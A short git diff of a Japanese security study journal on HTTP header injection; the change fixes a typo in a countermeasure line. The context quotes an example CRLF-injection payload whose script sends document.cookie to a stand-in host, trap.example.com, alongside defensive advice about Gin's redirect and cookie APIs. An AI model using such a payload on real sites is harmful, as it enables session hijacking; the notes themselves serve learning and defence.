--- a/journals/2023_08_20.md
+++ b/journals/2023_08_20.md
@@ -93,7 +93,7 @@
 		- JavaScriptを実行してCookieを盗んだり出来る
 			- `?url=http://example.jp/%0D%0A%0D%0A<script>fetch('http://trap.example.com?sid='%2Bdocument.cookie)</script>`など
 	- 対策
-		- 外部からのペラメータをレスポンスヘッダとして出力しない
+		- 外部からのパラメータをレスポンスヘッダとして出力しない
 		- LocationヘッダやSet-Cookieヘッダの出力を専用APIに任せる
 			- Ginの場合、ctx.Redirectやctx.SetCookieなど
 			- 中身の処理がどうなっているのか後で調べる
